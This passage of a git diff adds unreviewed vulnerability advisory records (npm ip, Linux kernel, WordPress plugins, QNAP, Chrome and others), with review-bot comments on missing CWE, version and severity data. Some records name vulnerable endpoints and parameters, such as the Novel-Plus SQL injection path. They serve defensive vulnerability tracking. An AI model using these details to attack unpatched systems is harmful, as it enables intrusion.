+ "nvd_published_at": "2024-02-02T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json b/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json
new file mode 100644
index 0000000000000..20edd5ca0c3a2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-78xj-cgh5-2h22/GHSA-78xj-cgh5-2h22.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-78xj-cgh5-2h22",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2023-42282"
+ ],
+ "details": "An issue in NPM IP Package v.1.1.8 and before allows an attacker to execute arbitrary code and obtain sensitive information via the isPublic() function.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42282"
+ },
+ {
+ "type": "WEB",
+ "url": "https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json b/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json
new file mode 100644
index 0000000000000..17174d4931b07
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-798f-8qgx-h85f/GHSA-798f-8qgx-h85f.json
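Review bot: `affected` is empty even though the description names an npm package and a version bound (`NPM IP Package v.1.1.8 and before`), and npm is an ecosystem this database maps; without an `affected` entry no dependency scanner will ever match this record to a lockfile. Populating it with the npm package and an `ECOSYSTEM` range — the fixed version must be confirmed from the upstream release, not taken from the `v.1.1.8` wording — and routing the record through review would make it actionable. `cwe_ids` and `severity` are also empty; that is expected for an unreviewed NVD import, but the description's claim of `execute arbitrary code` alongside an information-disclosure effect is unusual enough that the weakness should be pinned down at review rather than copied.

```json
"affected": [
  {
    "package": {
      "ecosystem": "npm",
      "name": "ip"
    },
    "ranges": [
      {
        "type": "ECOSYSTEM",
        "events": [
          { "introduced": "0" },
          { "fixed": "<FIXED_VERSION — confirm against the upstream release>" }
        ]
      }
    ]
  }
],
```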
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-798f-8qgx-h85f",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-1312"
+ ],
+ "details": "A use-after-free flaw was found in the Linux kernel's Memory Management subsystem when a user wins two races at the same time with a fail in the mas_prev_slot function. This issue could allow a local user to crash the system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1312"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2024-1312"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2225569"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json b/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json
new file mode 100644
index 0000000000000..f609d66f76331
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-7cgq-w654-fmv8/GHSA-7cgq-w654-fmv8.json
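Review bot: The git.kernel.org commit in `references` is the patch for this use-after-free but is typed `WEB`, the same as the Red Hat CVE page and the bugzilla entry; OSV's `FIX` reference type exists for exactly this case and lets consumers separate the patch from write-ups without parsing URLs. The same applies to the plugins.trac.wordpress.org changeset references in GHSA-78h2-jh6j-hhgf and GHSA-7cgq-w654-fmv8, if the exporter is able to emit that type for unreviewed records. If `WEB` is deliberately used for every non-NVD link in the unreviewed feed, a short note in the importer's type mapping would save the next reader this question.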
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cgq-w654-fmv8", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0869" + ], + "details": "The Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0869" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/instant-images/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json b/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json new file mode 100644 index 0000000000000..374f28d34998c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7frw-5wm8-4qp7/GHSA-7frw-5wm8-4qp7.json 
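Review bot: `cwe_ids` is empty although `details` spells out a missing check on which option is updated through the `instant-images/license` REST endpoint — that is missing authorization, `"cwe_ids": ["CWE-862"]`. The references pair `tags/6.1.0/api/license.php#L91` (vulnerable) with changeset 3027110 under `tags/6.1.1`, so the fix appears to be 6.1.1, but the record never states a fixed version; confirm it and add it to `details` or an `affected` range. Readers should be told that an arbitrary `update_option` primitive from an Author account is commonly chained into privilege escalation, which is presumably why the vector carries C:H/I:H/A:H despite PR:L.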
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7frw-5wm8-4qp7", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-23769" + ], + "details": "Improper privilege control for the named pipe in Samsung Magician PC Software 8.0.0 (for Windows) allows a local attacker to read privileged data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23769" + }, + { + "type": "WEB", + "url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json b/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json new file mode 100644 index 0000000000000..17c9b44770716 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7jgr-v7qj-qqxj/GHSA-7jgr-v7qj-qqxj.json 
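Review bot: The CVSS vector `C:H/I:H/A:H` with `UI:R` does not match `details`, which only describes a local attacker reading privileged data over a named pipe — a read-only leak implies I:N/A:N, and a named-pipe ACL weakness normally needs no user interaction — so one side of the record is wrong and the Samsung page is the only reference to resolve it against. `cwe_ids` is empty; "improper privilege control for the named pipe" is most naturally CWE-276 (incorrect default permissions) or CWE-732, to be confirmed. No fixed version is given beyond the single affected build 8.0.0.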
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jgr-v7qj-qqxj", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33068" + ], + "details": "Memory corruption in Audio while processing IIR config data from AFE calibration block.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33068" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json b/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json new file mode 100644 index 0000000000000..a18c3a6de693f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7jrg-2597-p2hc/GHSA-7jrg-2597-p2hc.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jrg-2597-p2hc", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-40544" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\nAn attacker with access to the network where the affected devices are located could maliciously actions to obtain, via a sniffer, sensitive information exchanged via TCP communications.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40544" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json b/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json new file mode 100644 index 0000000000000..979f1f010dafd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7m74-4w6g-p6gf/GHSA-7m74-4w6g-p6gf.json 
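Review bot: `details` is padded with eleven leading and four trailing `\n` and contains the ungrammatical "could maliciously actions to obtain"; a trimmed `"details": "An attacker on the same network as the affected devices could use a sniffer to obtain sensitive information exchanged over TCP."` says the same thing cleanly. The product is never named in the description — only the ICSA-24-023-04 reference identifies it (Westermo Lynx, judging from the sibling advisory in this batch that cites the same ICS-CERT page) — so the record is not self-describing. CWE-319 and the `AV:A/PR:N/C:H` vector are consistent with cleartext transmission.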
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m74-4w6g-p6gf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0699" + ], + "details": "The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0699" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json b/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json new file mode 100644 index 0000000000000..18dd92a8414ac --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7mgj-p9v3-3vxr/GHSA-7mgj-p9v3-3vxr.json 
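Review bot: `cwe_ids` is empty while `details` describes missing file-type validation in `add_image_from_url` leading to arbitrary file upload, which is exactly CWE-434: `"cwe_ids": ["CWE-434"]`. The only patch reference is a trunk changeset (3021494), so the fixed release is not recoverable from this record; "up to, and including, 2.1.4" suggests 2.1.5 but that should be confirmed and stated. Because the function's name indicates it fetches from a URL, a reader should also check whether the same path can be pointed at internal resources; the record does not say either way.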
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgj-p9v3-3vxr", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1283" + ], + "details": "Heap buffer overflow in Skia in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1283" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/41494860" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json b/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json new file mode 100644 index 0000000000000..fb76e1fc8e905 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7mjm-4vrc-ghvc/GHSA-7mjm-4vrc-ghvc.json 
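Review bot: `database_specific.severity` is `null` although `details` carries the upstream rating "(Chromium security severity: High)", so consumers filtering on severity will drop a heap-overflow bug that already has a fixed build; the upstream rating should be carried across rather than left null until NVD scores it. `cwe_ids` is likewise empty for what the text calls a heap buffer overflow — `"cwe_ids": ["CWE-787"]` (or CWE-122) is supportable from the description alone. The fixed build 121.0.6167.160 exists only in prose; Chrome is not a package ecosystem, so the empty `affected` is expected.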
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mjm-4vrc-ghvc", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50934" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses single-factor authentication which can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. IBM X-Force ID: 275114.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50934" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275114" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-308" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json b/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json new file mode 100644 index 0000000000000..92685e38adb2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pjv-fxwg-c5c3/GHSA-7pjv-fxwg-c5c3.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pjv-fxwg-c5c3", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-47144" + ], + "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 270271.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47144" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270271" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105139" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json new file mode 100644 index 0000000000000..225e29cfa4654 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pr9-232f-3fgg/GHSA-7pr9-232f-3fgg.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pr9-232f-3fgg", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24021" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/userFeedback/list.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24021" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24021.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json b/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json new file mode 100644 index 0000000000000..8cb69acefc822 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7pxx-x33w-55ch/GHSA-7pxx-x33w-55ch.json 
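Review bot: `cwe_ids` and `severity` are both empty for a SQL injection reachable through `/novel/userFeedback/list`; `"cwe_ids": ["CWE-89"]` follows directly from `details`. The injected parameters are `offset`, `limit` and `sort`, which typically land in ORDER BY / LIMIT clauses where bind parameters cannot be used, so a fix will need allow-listing of sort columns and integer-casting of the paging values — worth noting since no fix commit or release is referenced. The only non-vendor reference is a text file in a researcher's personal repository, and "v4.3.0-RC1 and prior" gives no fixed version.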
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pxx-x33w-55ch", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2024-24488" + ], + "details": "An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24488" + }, + { + "type": "WEB", + "url": "https://github.com/minj-ae/CVE-2024-24488" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json b/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json new file mode 100644 index 0000000000000..84060f09bab42 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7vp4-2f38-rg78/GHSA-7vp4-2f38-rg78.json 
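Review bot: `details` does not say what sensitive information is exposed or what "the password component" is, and the sole non-NVD reference is a third-party proof-of-concept repository rather than a vendor advisory, so the record gives an operator nothing to verify a fix against. `cwe_ids` is empty; if the PoC shows credentials recoverable by a local user, CWE-522 (insufficiently protected credentials) or CWE-200 would apply, to be confirmed. The firmware build `V11.10.00.2311090948` is the only version stated, with no fixed build.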
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vp4-2f38-rg78", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41276" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41276" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json b/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json new file mode 100644 index 0000000000000..b2869230efa53 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7vw2-84h4-6844/GHSA-7vw2-84h4-6844.json 
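Review bot: `details` says the flaw "could allow authenticated administrators to execute code", yet the vector scores `C:N/I:L/A:L`, which is not consistent with code execution; either the impact metrics or the prose is wrong, and the vector appears to be vendor-supplied, so the 5.5 MODERATE rating should be read with that caveat. For a CWE-120 buffer copy reachable by an administrator over the network a reader would expect at least I:H. The fixed builds (QTS 5.1.2.2533, QuTS hero h5.1.2.2534, QuTScloud c5.1.5.2651) are only listed in prose.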
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vw2-84h4-6844", + "modified": "2024-02-06T06:30:30Z", + "published": "2024-02-06T06:30:30Z", + "aliases": [ + "CVE-2024-23304" + ], + "details": "Cybozu KUNAI for Android 3.0.20 to 3.0.21 allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by performing certain operations.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23304" + }, + { + "type": "WEB", + "url": "https://cs.cybozu.co.jp/2024/010691.html" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN18743512/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T05:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json b/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json new file mode 100644 index 0000000000000..a7eec11e3d334 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w35-q47q-mvqv/GHSA-7w35-q47q-mvqv.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w35-q47q-mvqv", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45035" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45035" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json b/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json new file mode 100644 index 0000000000000..4046e7f5045c5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w7c-rqj8-5pmg/GHSA-7w7c-rqj8-5pmg.json 
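Review bot: The LOW rating (3.8) derives from `PR:H` combined with `C:N/I:L/A:L`, while `details` claims code execution by an authenticated administrator via the network — the same contradiction between prose and impact metrics as the other QNAP entry in this batch; anyone triaging should not treat a CWE-120 overflow reachable over the network as low-impact on the strength of this score alone. The fixed builds (QTS 5.1.4.2596, QuTS hero h5.1.4.2596, QuTScloud c5.1.5.2651) are present only in prose, with no structured `affected` data.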
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w7c-rqj8-5pmg", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-1149" + ], + "details": "Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1149" + }, + { + "type": "WEB", + "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json b/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json new file mode 100644 index 0000000000000..66a658afd4da0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7w82-p9xp-fp58/GHSA-7w82-p9xp-fp58.json 
